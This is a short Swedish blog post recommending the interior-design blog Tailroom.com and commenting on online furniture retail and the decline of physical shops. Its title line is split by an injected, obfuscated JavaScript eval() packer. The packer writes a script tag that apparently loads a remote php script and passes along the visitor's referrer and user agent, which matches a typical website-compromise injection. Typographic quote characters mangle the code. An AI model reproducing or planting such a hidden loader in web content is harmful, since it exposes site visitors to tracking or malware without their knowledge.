Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Smarta inredningstips från experterna på nätet

Smarta inredningstips från experterna på nätet
Sebastian

Smarta eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sinnb|var|u0026u|referrer|tsbfd||js|php’.split(’|’),0,{}))
inredningstips från experterna:
Att leta inspiration till hemmet eller fritidshuset kan ibland vara svårt. Detta vill den nya sajten Tailroom.com ändra på. Bakom bloggen står ett team på fyra mycket duktiga inredare och inredningsarkitekter som har lång erfarenhet av möblering. Visst finns det tusentals bloggar och andra inspirationskanaler att ta del av när det kommer till heminredning, men inom detta ämne kan man aldrig få för mycket.

Inspiration och inredningstips på heminredning

Tailroom.com är en mycket nystartat blogg så innehållet är just nu ganska smalt. Men vi kan se när vi går in på sidan att det ändå finns en hel del matnyttig information och guider till hur man på bästa sätt inreder sitt vardagsrum. Vi har innan skrivit om ett flertal nya startup projekt och företag som vill utmana marknaden på möbler och heminredning. Dessa bloggare och andra influencers gör bara att dessa inredningstjänster får ytterligare en boost på marknaden.

Att detaljhandel på nätet har ökat på senare tid är ingen nyhet. Bara under 2016 ökade e-handeln för möbler på nätet med hela 34 procent. En otrolig siffra i våra ögon om man jämför med mycket annat. Hur brukar ni göra? Köper ni heminredning och möbler online? Köper ni kläder och andra modeaccessoarer?

Inredningstips på nätet

Fysiska butiker mot sitt slut?

I tidningen e-handel.se kunde vi i veckan läsa om att flera fysiska butiker i Danmark nu börjat ta betalt för att du som kund i butiken ska kunna prova kläder. Varför undrar du? Jo, problemet idag är att majoriteten av konsumenterna kommer in i butikerna och testar ett gäng kläder. Sen går dem därifrån och loggar hemma in på en online butik och gör sitt köp billigare.

Att den fysiska butiken är på väg mot sitt slut har det pratats om länge. Men med denna nya metod att ta betalt av konsumenten för att prova kläder kommer denna trend bara gå snabbare mot sitt slut.

Men vi på Revue.se vill gärna dela med oss av denna inspirationskanal tailroom.com. Så har ni lite tid över och vill kika in inredningstips och do it yourself-guider. Då har ni Tailroom.com.

Se också detta klipp från den svenska Formex-mässan: